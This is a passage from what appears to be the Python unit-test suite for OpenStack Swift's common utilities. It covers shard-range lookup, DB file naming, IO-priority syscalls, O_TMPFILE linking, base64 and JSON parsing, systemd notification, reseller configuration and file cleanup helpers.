utils.renamer("fake_path", "/a/b/c.data", fsync=False) _m_makedirs_count.assert_called_once_with("/a/b") _m_os_rename.assert_called_once_with('fake_path', "/a/b/c.data") self.assertFalse(_m_fsync_dir.called) def test_makedirs_count(self): tempdir = None fd = None try: tempdir = mkdtemp() os.makedirs(os.path.join(tempdir, 'a/b')) # 4 new dirs created dirpath = os.path.join(tempdir, 'a/b/1/2/3/4') ret = utils.makedirs_count(dirpath) self.assertEqual(ret, 4) # no new dirs created - dir already exists ret = utils.makedirs_count(dirpath) self.assertEqual(ret, 0) # path exists and is a file fd, temppath = tempfile.mkstemp(dir=dirpath) os.close(fd) self.assertRaises(OSError, utils.makedirs_count, temppath) finally: if tempdir: shutil.rmtree(tempdir) def test_find_shard_range(self): ts = utils.Timestamp.now().internal start = utils.ShardRange('a/-a', ts, '', 'a') atof = utils.ShardRange('a/a-f', ts, 'a', 'f') ftol = utils.ShardRange('a/f-l', ts, 'f', 'l') ltor = utils.ShardRange('a/l-r', ts, 'l', 'r') rtoz = utils.ShardRange('a/r-z', ts, 'r', 'z') end = utils.ShardRange('a/z-', ts, 'z', '') ranges = [start, atof, ftol, ltor, rtoz, end] found = utils.find_shard_range('', ranges) self.assertEqual(found, None) found = utils.find_shard_range(' ', ranges) self.assertEqual(found, start) found = utils.find_shard_range(' ', ranges[1:]) self.assertEqual(found, None) found = utils.find_shard_range('b', ranges) self.assertEqual(found, atof) found = utils.find_shard_range('f', ranges) self.assertEqual(found, atof) found = utils.find_shard_range('f\x00', ranges) self.assertEqual(found, ftol) found = utils.find_shard_range('x', ranges) self.assertEqual(found, rtoz) found = utils.find_shard_range('r', ranges) self.assertEqual(found, ltor) found = utils.find_shard_range('}', ranges) self.assertEqual(found, end) found = utils.find_shard_range('}', ranges[:-1]) self.assertEqual(found, None) # remove l-r from list of ranges and try and find a shard range for an # item in that range. found = utils.find_shard_range('p', ranges[:-3] + ranges[-2:]) self.assertEqual(found, None) # add some sub-shards; a sub-shard's state is less than its parent # while the parent is undeleted, so insert these ahead of the # overlapping parent in the list of ranges ftoh = utils.ShardRange('a/f-h', ts, 'f', 'h') htok = utils.ShardRange('a/h-k', ts, 'h', 'k') overlapping_ranges = ranges[:2] + [ftoh, htok] + ranges[2:] found = utils.find_shard_range('g', overlapping_ranges) self.assertEqual(found, ftoh) found = utils.find_shard_range('h', overlapping_ranges) self.assertEqual(found, ftoh) found = utils.find_shard_range('k', overlapping_ranges) self.assertEqual(found, htok) found = utils.find_shard_range('l', overlapping_ranges) self.assertEqual(found, ftol) found = utils.find_shard_range('m', overlapping_ranges) self.assertEqual(found, ltor) ktol = utils.ShardRange('a/k-l', ts, 'k', 'l') overlapping_ranges = ranges[:2] + [ftoh, htok, ktol] + ranges[2:] found = utils.find_shard_range('l', overlapping_ranges) self.assertEqual(found, ktol) def test_parse_db_filename(self): actual = utils.parse_db_filename('hash.db') self.assertEqual(('hash', None, '.db'), actual) actual = utils.parse_db_filename('hash_1234567890.12345.db') self.assertEqual(('hash', '1234567890.12345', '.db'), actual) actual = utils.parse_db_filename( '/dev/containers/part/ash/hash/hash_1234567890.12345.db') self.assertEqual(('hash', '1234567890.12345', '.db'), actual) self.assertRaises(ValueError, utils.parse_db_filename, '/path/to/dir/') # These shouldn't come up in practice; included for completeness self.assertEqual(utils.parse_db_filename('hashunder_.db'), ('hashunder', '', '.db')) self.assertEqual(utils.parse_db_filename('lots_of_underscores.db'), ('lots', 'of', '.db')) def test_make_db_file_path(self): epoch = utils.Timestamp.now() actual = utils.make_db_file_path('hash.db', epoch) self.assertEqual('hash_%s.db' % epoch.internal, actual) actual = utils.make_db_file_path('hash_oldepoch.db', epoch) self.assertEqual('hash_%s.db' % epoch.internal, actual) actual = utils.make_db_file_path('/path/to/hash.db', epoch) self.assertEqual('/path/to/hash_%s.db' % epoch.internal, actual) epoch = utils.Timestamp.now() actual = utils.make_db_file_path(actual, epoch) self.assertEqual('/path/to/hash_%s.db' % epoch.internal, actual) # None strips epoch self.assertEqual('hash.db', utils.make_db_file_path('hash.db', None)) self.assertEqual('/path/to/hash.db', utils.make_db_file_path( '/path/to/hash_withepoch.db', None)) # epochs shouldn't have offsets epoch = utils.Timestamp.now(offset=10) actual = utils.make_db_file_path(actual, epoch) self.assertEqual('/path/to/hash_%s.db' % epoch.normal, actual) self.assertRaises(ValueError, utils.make_db_file_path, '/path/to/hash.db', 'bad epoch') def test_modify_priority(self): pid = os.getpid() logger = debug_logger() called = {} def _fake_setpriority(*args): called['setpriority'] = args def _fake_syscall(*args): called['syscall'] = args # Test if current architecture supports changing of priority try: utils.NR_ioprio_set() except OSError as e: raise unittest.SkipTest(e) with patch('swift.common.utils._libc_setpriority', _fake_setpriority), \ patch('swift.common.utils._posix_syscall', _fake_syscall): called = {} # not set / default utils.modify_priority({}, logger) self.assertEqual(called, {}) called = {} # just nice utils.modify_priority({'nice_priority': '1'}, logger) self.assertEqual(called, {'setpriority': (0, pid, 1)}) called = {} # just ionice class uses default priority 0 utils.modify_priority({'ionice_class': 'IOPRIO_CLASS_RT'}, logger) architecture = os.uname()[4] arch_bits = platform.architecture()[0] if architecture == 'x86_64' and arch_bits == '64bit': self.assertEqual(called, {'syscall': (251, 1, pid, 1 << 13)}) elif architecture == 'aarch64' and arch_bits == '64bit': self.assertEqual(called, {'syscall': (30, 1, pid, 1 << 13)}) else: self.fail("Unexpected call: %r" % called) called = {} # just ionice priority is ignored utils.modify_priority({'ionice_priority': '4'}, logger) self.assertEqual(called, {}) called = {} # bad ionice class utils.modify_priority({'ionice_class': 'class_foo'}, logger) self.assertEqual(called, {}) called = {} # ionice class & priority utils.modify_priority({ 'ionice_class': 'IOPRIO_CLASS_BE', 'ionice_priority': '4', }, logger) if architecture == 'x86_64' and arch_bits == '64bit': self.assertEqual(called, { 'syscall': (251, 1, pid, 2 << 13 | 4) }) elif architecture == 'aarch64' and arch_bits == '64bit': self.assertEqual(called, { 'syscall': (30, 1, pid, 2 << 13 | 4) }) else: self.fail("Unexpected call: %r" % called) called = {} # all utils.modify_priority({ 'nice_priority': '-15', 'ionice_class': 'IOPRIO_CLASS_IDLE', 'ionice_priority': '6', }, logger) if architecture == 'x86_64' and arch_bits == '64bit': self.assertEqual(called, { 'setpriority': (0, pid, -15), 'syscall': (251, 1, pid, 3 << 13 | 6), }) elif architecture == 'aarch64' and arch_bits == '64bit': self.assertEqual(called, { 'setpriority': (0, pid, -15), 'syscall': (30, 1, pid, 3 << 13 | 6), }) else: self.fail("Unexpected call: %r" % called) def test__NR_ioprio_set(self): with patch('os.uname', return_value=('', '', '', '', 'x86_64')), \ patch('platform.architecture', return_value=('64bit', '')): self.assertEqual(251, utils.NR_ioprio_set()) with patch('os.uname', return_value=('', '', '', '', 'x86_64')), \ patch('platform.architecture', return_value=('32bit', '')): self.assertRaises(OSError, utils.NR_ioprio_set) with patch('os.uname', return_value=('', '', '', '', 'aarch64')), \ patch('platform.architecture', return_value=('64bit', '')): self.assertEqual(30, utils.NR_ioprio_set()) with patch('os.uname', return_value=('', '', '', '', 'aarch64')), \ patch('platform.architecture', return_value=('32bit', '')): self.assertRaises(OSError, utils.NR_ioprio_set) with patch('os.uname', return_value=('', '', '', '', 'alpha')), \ patch('platform.architecture', return_value=('64bit', '')): self.assertRaises(OSError, utils.NR_ioprio_set) @requires_o_tmpfile_support_in_tmp def test_link_fd_to_path_linkat_success(self): tempdir = mkdtemp() fd = os.open(tempdir, utils.O_TMPFILE | os.O_WRONLY) data = b"I'm whatever Gotham needs me to be" _m_fsync_dir = mock.Mock() try: os.write(fd, data) # fd is O_WRONLY self.assertRaises(OSError, os.read, fd, 1) file_path = os.path.join(tempdir, uuid4().hex) with mock.patch('swift.common.utils.fsync_dir', _m_fsync_dir): utils.link_fd_to_path(fd, file_path, 1) with open(file_path, 'rb') as f: self.assertEqual(f.read(), data) self.assertEqual(_m_fsync_dir.call_count, 2) finally: os.close(fd) shutil.rmtree(tempdir) @requires_o_tmpfile_support_in_tmp def test_link_fd_to_path_target_exists(self): tempdir = mkdtemp() # Create and write to a file fd, path = tempfile.mkstemp(dir=tempdir) os.write(fd, b"hello world") os.fsync(fd) os.close(fd) self.assertTrue(os.path.exists(path)) fd = os.open(tempdir, utils.O_TMPFILE | os.O_WRONLY) try: os.write(fd, b"bye world") os.fsync(fd) utils.link_fd_to_path(fd, path, 0, fsync=False) # Original file now should have been over-written with open(path, 'rb') as f: self.assertEqual(f.read(), b"bye world") finally: os.close(fd) shutil.rmtree(tempdir) def test_link_fd_to_path_errno_not_EEXIST_or_ENOENT(self): _m_linkat = mock.Mock( side_effect=IOError(errno.EACCES, os.strerror(errno.EACCES))) with mock.patch('swift.common.utils.linkat', _m_linkat): try: utils.link_fd_to_path(0, '/path', 1) except IOError as err: self.assertEqual(err.errno, errno.EACCES) else: self.fail("Expecting IOError exception") self.assertTrue(_m_linkat.called) @requires_o_tmpfile_support_in_tmp def test_linkat_race_dir_not_exists(self): tempdir = mkdtemp() target_dir = os.path.join(tempdir, uuid4().hex) target_path = os.path.join(target_dir, uuid4().hex) os.mkdir(target_dir) fd = os.open(target_dir, utils.O_TMPFILE | os.O_WRONLY) # Simulating directory deletion by other backend process os.rmdir(target_dir) self.assertFalse(os.path.exists(target_dir)) try: utils.link_fd_to_path(fd, target_path, 1) self.assertTrue(os.path.exists(target_dir)) self.assertTrue(os.path.exists(target_path)) finally: os.close(fd) shutil.rmtree(tempdir) def test_safe_json_loads(self): expectations = { None: None, '': None, 0: None, 1: None, '"asdf"': 'asdf', '[]': [], '{}': {}, "{'foo': 'bar'}": None, '{"foo": "bar"}': {'foo': 'bar'}, } failures = [] for value, expected in expectations.items(): try: result = utils.safe_json_loads(value) except Exception as e: # it's called safe, if it blows up the test blows up self.fail('%r caused safe method to throw %r!' % ( value, e)) try: self.assertEqual(expected, result) except AssertionError: failures.append('%r => %r (expected %r)' % ( value, result, expected)) if failures: self.fail('Invalid results from pure function:\n%s' % '\n'.join(failures)) def test_strict_b64decode(self): expectations = { None: ValueError, 0: ValueError, b'': b'', u'': b'', b'A': ValueError, b'AA': ValueError, b'AAA': ValueError, b'AAAA': b'\x00\x00\x00', u'AAAA': b'\x00\x00\x00', b'////': b'\xff\xff\xff', u'////': b'\xff\xff\xff', b'A===': ValueError, b'AA==': b'\x00', b'AAA=': b'\x00\x00', b' AAAA': ValueError, b'AAAA ': ValueError, b'AAAA============': b'\x00\x00\x00', b'AA&AA==': ValueError, b'====': b'', } failures = [] for value, expected in expectations.items(): try: result = utils.strict_b64decode(value) except Exception as e: if inspect.isclass(expected) and issubclass( expected, Exception): if not isinstance(e, expected): failures.append('%r raised %r (expected to raise %r)' % (value, e, expected)) else: failures.append('%r raised %r (expected to return %r)' % (value, e, expected)) else: if inspect.isclass(expected) and issubclass( expected, Exception): failures.append('%r => %r (expected to raise %r)' % (value, result, expected)) elif result != expected: failures.append('%r => %r (expected %r)' % ( value, result, expected)) if failures: self.fail('Invalid results from pure function:\n%s' % '\n'.join(failures)) def test_replace_partition_in_path(self): # Check for new part = part * 2 old = '/s/n/d/o/700/c77/af088baea4806dcaba30bf07d9e64c77/f' new = '/s/n/d/o/1400/c77/af088baea4806dcaba30bf07d9e64c77/f' # Expected outcome self.assertEqual(utils.replace_partition_in_path(old, 11), new) # Make sure there is no change if the part power didn't change self.assertEqual(utils.replace_partition_in_path(old, 10), old) self.assertEqual(utils.replace_partition_in_path(new, 11), new) # Check for new part = part * 2 + 1 old = '/s/n/d/o/693/c77/ad708baea4806dcaba30bf07d9e64c77/f' new = '/s/n/d/o/1387/c77/ad708baea4806dcaba30bf07d9e64c77/f' # Expected outcome self.assertEqual(utils.replace_partition_in_path(old, 11), new) # Make sure there is no change if the part power didn't change self.assertEqual(utils.replace_partition_in_path(old, 10), old) self.assertEqual(utils.replace_partition_in_path(new, 11), new) def test_round_robin_iter(self): it1 = iter([1, 2, 3]) it2 = iter([4, 5]) it3 = iter([6, 7, 8, 9]) it4 = iter([]) rr_its = utils.round_robin_iter([it1, it2, it3, it4]) got = list(rr_its) # Expect that items get fetched in a round-robin fashion from the # iterators self.assertListEqual([1, 4, 6, 2, 5, 7, 3, 8, 9], got) @with_tempdir def test_get_db_files(self, tempdir): dbdir = os.path.join(tempdir, 'dbdir') self.assertEqual([], utils.get_db_files(dbdir)) path_1 = os.path.join(dbdir, 'dbfile.db') self.assertEqual([], utils.get_db_files(path_1)) os.mkdir(dbdir) self.assertEqual([], utils.get_db_files(path_1)) with open(path_1, 'wb'): pass self.assertEqual([path_1], utils.get_db_files(path_1)) path_2 = os.path.join(dbdir, 'dbfile_2.db') self.assertEqual([path_1], utils.get_db_files(path_2)) with open(path_2, 'wb'): pass self.assertEqual([path_1, path_2], utils.get_db_files(path_1)) self.assertEqual([path_1, path_2], utils.get_db_files(path_2)) path_3 = os.path.join(dbdir, 'dbfile_3.db') self.assertEqual([path_1, path_2], utils.get_db_files(path_3)) with open(path_3, 'wb'): pass self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_1)) self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_2)) self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_3)) other_hash = os.path.join(dbdir, 'other.db') self.assertEqual([], utils.get_db_files(other_hash)) other_hash = os.path.join(dbdir, 'other_1.db') self.assertEqual([], utils.get_db_files(other_hash)) pending = os.path.join(dbdir, 'dbfile.pending') self.assertEqual([path_1, path_2, path_3], utils.get_db_files(pending)) with open(pending, 'wb'): pass self.assertEqual([path_1, path_2, path_3], utils.get_db_files(pending)) self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_1)) self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_2)) self.assertEqual([path_1, path_2, path_3], utils.get_db_files(path_3)) self.assertEqual([], utils.get_db_files(dbdir)) os.unlink(path_1) self.assertEqual([path_2, path_3], utils.get_db_files(path_1)) self.assertEqual([path_2, path_3], utils.get_db_files(path_2)) self.assertEqual([path_2, path_3], utils.get_db_files(path_3)) os.unlink(path_2) self.assertEqual([path_3], utils.get_db_files(path_1)) self.assertEqual([path_3], utils.get_db_files(path_2)) self.assertEqual([path_3], utils.get_db_files(path_3)) os.unlink(path_3) self.assertEqual([], utils.get_db_files(path_1)) self.assertEqual([], utils.get_db_files(path_2)) self.assertEqual([], utils.get_db_files(path_3)) self.assertEqual([], utils.get_db_files('/path/to/nowhere')) def test_get_redirect_data(self): ts_now = utils.Timestamp.now() headers = {'X-Backend-Redirect-Timestamp': ts_now.internal} response = FakeResponse(200, headers, b'') self.assertIsNone(utils.get_redirect_data(response)) headers = {'Location': '/a/c/o', 'X-Backend-Redirect-Timestamp': ts_now.internal} response = FakeResponse(200, headers, b'') path, ts = utils.get_redirect_data(response) self.assertEqual('a/c', path) self.assertEqual(ts_now, ts) headers = {'Location': '/a/c', 'X-Backend-Redirect-Timestamp': ts_now.internal} response = FakeResponse(200, headers, b'') path, ts = utils.get_redirect_data(response) self.assertEqual('a/c', path) self.assertEqual(ts_now, ts) def do_test(headers): response = FakeResponse(200, headers, b'') with self.assertRaises(ValueError) as cm: utils.get_redirect_data(response) return cm.exception exc = do_test({'Location': '/a', 'X-Backend-Redirect-Timestamp': ts_now.internal}) self.assertIn('Invalid path', str(exc)) exc = do_test({'Location': '', 'X-Backend-Redirect-Timestamp': ts_now.internal}) self.assertIn('Invalid path', str(exc)) exc = do_test({'Location': '/a/c', 'X-Backend-Redirect-Timestamp': 'bad'}) self.assertIn('Invalid timestamp', str(exc)) exc = do_test({'Location': '/a/c'}) self.assertIn('Invalid timestamp', str(exc)) exc = do_test({'Location': '/a/c', 'X-Backend-Redirect-Timestamp': '-1'}) self.assertIn('Invalid timestamp', str(exc)) @mock.patch('pkg_resources.load_entry_point') def test_load_pkg_resource(self, mock_driver): tests = { ('swift.diskfile', 'egg:swift#replication.fs'): ('swift', 'swift.diskfile', 'replication.fs'), ('swift.diskfile', 'egg:swift#erasure_coding.fs'): ('swift', 'swift.diskfile', 'erasure_coding.fs'), ('swift.section', 'egg:swift#thing.other'): ('swift', 'swift.section', 'thing.other'), ('swift.section', 'swift#thing.other'): ('swift', 'swift.section', 'thing.other'), ('swift.section', 'thing.other'): ('swift', 'swift.section', 'thing.other'), } for args, expected in tests.items(): utils.load_pkg_resource(*args) mock_driver.assert_called_with(*expected) with self.assertRaises(TypeError) as cm: args = ('swift.diskfile', 'nog:swift#replication.fs') utils.load_pkg_resource(*args) self.assertEqual("Unhandled URI scheme: 'nog'", str(cm.exception)) def test_systemd_notify(self): m_sock = mock.Mock(connect=mock.Mock(), sendall=mock.Mock()) with mock.patch('swift.common.utils.socket.socket', return_value=m_sock) as m_socket: # No notification socket m_socket.reset_mock() m_sock.reset_mock() utils.systemd_notify() self.assertEqual(m_socket.call_count, 0) self.assertEqual(m_sock.connect.call_count, 0) self.assertEqual(m_sock.sendall.call_count, 0) # File notification socket m_socket.reset_mock() m_sock.reset_mock() os.environ['NOTIFY_SOCKET'] = 'foobar' utils.systemd_notify() m_socket.assert_called_once_with(socket.AF_UNIX, socket.SOCK_DGRAM) m_sock.connect.assert_called_once_with('foobar') m_sock.sendall.assert_called_once_with(b'READY=1') self.assertNotIn('NOTIFY_SOCKET', os.environ) # Abstract notification socket m_socket.reset_mock() m_sock.reset_mock() os.environ['NOTIFY_SOCKET'] = '@foobar' utils.systemd_notify() m_socket.assert_called_once_with(socket.AF_UNIX, socket.SOCK_DGRAM) m_sock.connect.assert_called_once_with('\0foobar') m_sock.sendall.assert_called_once_with(b'READY=1') self.assertNotIn('NOTIFY_SOCKET', os.environ) # Test logger with connection error m_sock = mock.Mock(connect=mock.Mock(side_effect=EnvironmentError), sendall=mock.Mock()) m_logger = mock.Mock(debug=mock.Mock()) with mock.patch('swift.common.utils.socket.socket', return_value=m_sock) as m_socket: os.environ['NOTIFY_SOCKET'] = '@foobar' m_sock.reset_mock() m_logger.reset_mock() utils.systemd_notify() self.assertEqual(0, m_sock.sendall.call_count) self.assertEqual(0, m_logger.debug.call_count) m_sock.reset_mock() m_logger.reset_mock() utils.systemd_notify(logger=m_logger) self.assertEqual(0, m_sock.sendall.call_count) m_logger.debug.assert_called_once_with( "Systemd notification failed", exc_info=True) # Test it for real sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM) sock.settimeout(5) sock.bind('\0foobar') os.environ['NOTIFY_SOCKET'] = '@foobar' utils.systemd_notify() msg = sock.recv(512) sock.close() self.assertEqual(msg, b'READY=1') self.assertNotIn('NOTIFY_SOCKET', os.environ) class ResellerConfReader(unittest.TestCase): def setUp(self): self.default_rules = {'operator_roles': ['admin', 'swiftoperator'], 'service_roles': [], 'require_group': ''} def test_defaults(self): conf = {} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_']) self.assertEqual(options['AUTH_'], self.default_rules) def test_same_as_default(self): conf = {'reseller_prefix': 'AUTH', 'operator_roles': 'admin, swiftoperator'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_']) self.assertEqual(options['AUTH_'], self.default_rules) def test_single_blank_reseller(self): conf = {'reseller_prefix': ''} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['']) self.assertEqual(options[''], self.default_rules) def test_single_blank_reseller_with_conf(self): conf = {'reseller_prefix': '', "''operator_roles": 'role1, role2'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['']) self.assertEqual(options[''].get('operator_roles'), ['role1', 'role2']) self.assertEqual(options[''].get('service_roles'), self.default_rules.get('service_roles')) self.assertEqual(options[''].get('require_group'), self.default_rules.get('require_group')) def test_multiple_same_resellers(self): conf = {'reseller_prefix': " '' , '' "} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['']) conf = {'reseller_prefix': '_, _'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['_']) conf = {'reseller_prefix': 'AUTH, PRE2, AUTH, PRE2'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_', 'PRE2_']) def test_several_resellers_with_conf(self): conf = {'reseller_prefix': 'PRE1, PRE2', 'PRE1_operator_roles': 'role1, role2', 'PRE1_service_roles': 'role3, role4', 'PRE2_operator_roles': 'role5', 'PRE2_service_roles': 'role6', 'PRE2_require_group': 'pre2_group'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['PRE1_', 'PRE2_']) self.assertEqual(set(['role1', 'role2']), set(options['PRE1_'].get('operator_roles'))) self.assertEqual(['role5'], options['PRE2_'].get('operator_roles')) self.assertEqual(set(['role3', 'role4']), set(options['PRE1_'].get('service_roles'))) self.assertEqual(['role6'], options['PRE2_'].get('service_roles')) self.assertEqual('', options['PRE1_'].get('require_group')) self.assertEqual('pre2_group', options['PRE2_'].get('require_group')) def test_several_resellers_first_blank(self): conf = {'reseller_prefix': " '' , PRE2", "''operator_roles": 'role1, role2', "''service_roles": 'role3, role4', 'PRE2_operator_roles': 'role5', 'PRE2_service_roles': 'role6', 'PRE2_require_group': 'pre2_group'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['', 'PRE2_']) self.assertEqual(set(['role1', 'role2']), set(options[''].get('operator_roles'))) self.assertEqual(['role5'], options['PRE2_'].get('operator_roles')) self.assertEqual(set(['role3', 'role4']), set(options[''].get('service_roles'))) self.assertEqual(['role6'], options['PRE2_'].get('service_roles')) self.assertEqual('', options[''].get('require_group')) self.assertEqual('pre2_group', options['PRE2_'].get('require_group')) def test_several_resellers_with_blank_comma(self): conf = {'reseller_prefix': "AUTH , '', PRE2", "''operator_roles": 'role1, role2', "''service_roles": 'role3, role4', 'PRE2_operator_roles': 'role5', 'PRE2_service_roles': 'role6', 'PRE2_require_group': 'pre2_group'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_']) self.assertEqual(set(['admin', 'swiftoperator']), set(options['AUTH_'].get('operator_roles'))) self.assertEqual(set(['role1', 'role2']), set(options[''].get('operator_roles'))) self.assertEqual(['role5'], options['PRE2_'].get('operator_roles')) self.assertEqual([], options['AUTH_'].get('service_roles')) self.assertEqual(set(['role3', 'role4']), set(options[''].get('service_roles'))) self.assertEqual(['role6'], options['PRE2_'].get('service_roles')) self.assertEqual('', options['AUTH_'].get('require_group')) self.assertEqual('', options[''].get('require_group')) self.assertEqual('pre2_group', options['PRE2_'].get('require_group')) def test_stray_comma(self): conf = {'reseller_prefix': "AUTH ,, PRE2", "''operator_roles": 'role1, role2', "''service_roles": 'role3, role4', 'PRE2_operator_roles': 'role5', 'PRE2_service_roles': 'role6', 'PRE2_require_group': 'pre2_group'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_', 'PRE2_']) self.assertEqual(set(['admin', 'swiftoperator']), set(options['AUTH_'].get('operator_roles'))) self.assertEqual(['role5'], options['PRE2_'].get('operator_roles')) self.assertEqual([], options['AUTH_'].get('service_roles')) self.assertEqual(['role6'], options['PRE2_'].get('service_roles')) self.assertEqual('', options['AUTH_'].get('require_group')) self.assertEqual('pre2_group', options['PRE2_'].get('require_group')) def test_multiple_stray_commas_resellers(self): conf = {'reseller_prefix': ' , , ,'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['']) self.assertEqual(options[''], self.default_rules) def test_unprefixed_options(self): conf = {'reseller_prefix': "AUTH , '', PRE2", "operator_roles": 'role1, role2', "service_roles": 'role3, role4', 'require_group': 'auth_blank_group', 'PRE2_operator_roles': 'role5', 'PRE2_service_roles': 'role6', 'PRE2_require_group': 'pre2_group'} prefixes, options = utils.config_read_reseller_options( conf, self.default_rules) self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_']) self.assertEqual(set(['role1', 'role2']), set(options['AUTH_'].get('operator_roles'))) self.assertEqual(set(['role1', 'role2']), set(options[''].get('operator_roles'))) self.assertEqual(['role5'], options['PRE2_'].get('operator_roles')) self.assertEqual(set(['role3', 'role4']), set(options['AUTH_'].get('service_roles'))) self.assertEqual(set(['role3', 'role4']), set(options[''].get('service_roles'))) self.assertEqual(['role6'], options['PRE2_'].get('service_roles')) self.assertEqual('auth_blank_group', options['AUTH_'].get('require_group')) self.assertEqual('auth_blank_group', options[''].get('require_group')) self.assertEqual('pre2_group', options['PRE2_'].get('require_group')) class TestUnlinkOlder(unittest.TestCase): def setUp(self): self.tempdir = mkdtemp() self.mtime = {} self.ts = make_timestamp_iter() def tearDown(self): rmtree(self.tempdir, ignore_errors=True) def touch(self, fpath, mtime=None): self.mtime[fpath] = mtime or next(self.ts) open(fpath, 'w') @contextlib.contextmanager def high_resolution_getmtime(self): orig_getmtime = os.path.getmtime def mock_getmtime(fpath): mtime = self.mtime.get(fpath) if mtime is None: mtime = orig_getmtime(fpath) return mtime with mock.patch('os.path.getmtime', mock_getmtime): yield def test_unlink_older_than_path_not_exists(self): path = os.path.join(self.tempdir, 'does-not-exist') # just make sure it doesn't blow up utils.unlink_older_than(path, next(self.ts)) def test_unlink_older_than_file(self): path = os.path.join(self.tempdir, 'some-file') self.touch(path) with self.assertRaises(OSError) as ctx: utils.unlink_older_than(path, next(self.ts)) self.assertEqual(ctx.exception.errno, errno.ENOTDIR) def test_unlink_older_than_now(self): self.touch(os.path.join(self.tempdir, 'test')) with self.high_resolution_getmtime(): utils.unlink_older_than(self.tempdir, next(self.ts)) self.assertEqual([], os.listdir(self.tempdir)) def test_unlink_not_old_enough(self): start = next(self.ts) self.touch(os.path.join(self.tempdir, 'test')) with self.high_resolution_getmtime(): utils.unlink_older_than(self.tempdir, start) self.assertEqual(['test'], os.listdir(self.tempdir)) def test_unlink_mixed(self): self.touch(os.path.join(self.tempdir, 'first')) cutoff = next(self.ts) self.touch(os.path.join(self.tempdir, 'second')) with self.high_resolution_getmtime(): utils.unlink_older_than(self.tempdir, cutoff) self.assertEqual(['second'], os.listdir(self.tempdir)) def test_unlink_paths(self): paths = [] for item in ('first', 'second', 'third'): path = os.path.join(self.tempdir, item) self.touch(path) paths.append(path) # don't unlink everyone with self.high_resolution_getmtime(): utils.unlink_paths_older_than(paths[:2], next(self.ts)) self.assertEqual(['third'], os.listdir(self.tempdir)) def test_unlink_empty_paths(self): # just make sure it doesn't blow up utils.unlink_paths_older_than([], next(self.ts)) def test_unlink_not_exists_paths(self): path = os.path.join(self.tempdir, 'does-not-exist') # just make sure it doesn't blow up utils.unlink_paths_older_than([path], next(self.ts)) class TestSwiftInfo(unittest.TestCase): def tearDown(self): utils._swift_info = {} utils._swift_admin_info = {} def test_register_swift_info(self): utils.register_swift_info(foo='bar') utils.register_swift_info(lorem='ipsum') utils.register_swift_info('cap1', cap1_foo='cap1_bar') utils.register_swift_info('cap1', cap1_lorem='cap1_ipsum') self.assertTrue('swift' in utils._swift_info) self.assertTrue('foo' in utils._swift_info['swift']) self.assertEqual(utils._swift_info['swift']['foo'], 'bar') self.assertTrue('lorem' in utils._swift_info['swift']) self.assertEqual(utils._swift_info['swift']['lorem'], 'ipsum') self.assertTrue('cap1' in utils._swift_info) self.assertTrue('cap1_foo' in utils._swift_info['cap1']) self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar') self.assertTrue('cap1_lorem' in utils._swift_info['cap1']) self.assertEqual(utils._swift_info['cap1']['cap1_lorem'], 'cap1_ipsum') self.assertRaises(ValueError, utils.register_swift_info, 'admin', foo='bar') self.assertRaises(ValueError, utils.register_swift_info, 'disallowed_sections', disallowed_sections=None) utils.register_swift_info('goodkey', foo='5.6') self.assertRaises(ValueError, utils.register_swift_info, 'bad.key', foo='5.6') data = {'bad.key': '5.6'} self.assertRaises(ValueError, utils.register_swift_info, 'goodkey', **data) def test_get_swift_info(self): utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': {'cap1_foo': 'cap1_bar'}} utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}} info = utils.get_swift_info() self.assertNotIn('admin', info) self.assertIn('swift', info) self.assertIn('foo', info['swift']) self.assertEqual(utils._swift_info['swift']['foo'], 'bar') self.assertIn('cap1', info) self.assertIn('cap1_foo', info['cap1']) self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar') def test_get_swift_info_with_disallowed_sections(self): utils._swift_info = {'swift': {'foo': 'bar'}, 'cap1': {'cap1_foo': 'cap1_bar'}, 'cap2': {'cap2_foo': 'cap2_bar'}, 'cap3': {'cap3_foo': 'cap3_bar'}} utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}} info = utils.get_swift_info(disallowed_sections=['cap1', 'cap3']) self.assertNotIn('admin', info) self.assertIn('swift', info) self.assertIn('foo', info['swift']) self.assertEqual(info['swift']['foo'], 'bar') self.assertNotIn('cap1', info) self.assertIn('cap2', info) self.assertIn('cap2_foo', info['cap2']) self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar') self.assertNotIn('cap3', info) def test_register_swift_admin_info(self): utils.register_swift_info(admin=True, admin_foo='admin_bar') utils.register_swift_info(admin=True, admin_lorem='admin_ipsum') utils.register_swift_info('cap1', admin=True, ac1_foo='ac1_bar') utils.register_swift_info('cap1', admin=True, ac1_lorem='ac1_ipsum') self.assertIn('swift', utils._swift_admin_info) self.assertIn('admin_foo', utils._swift_admin_info['swift']) self.assertEqual( utils._swift_admin_info['swift']['admin_foo'], 'admin_bar') self.assertIn('admin_lorem', utils._swift_admin_info['swift']) self.assertEqual( 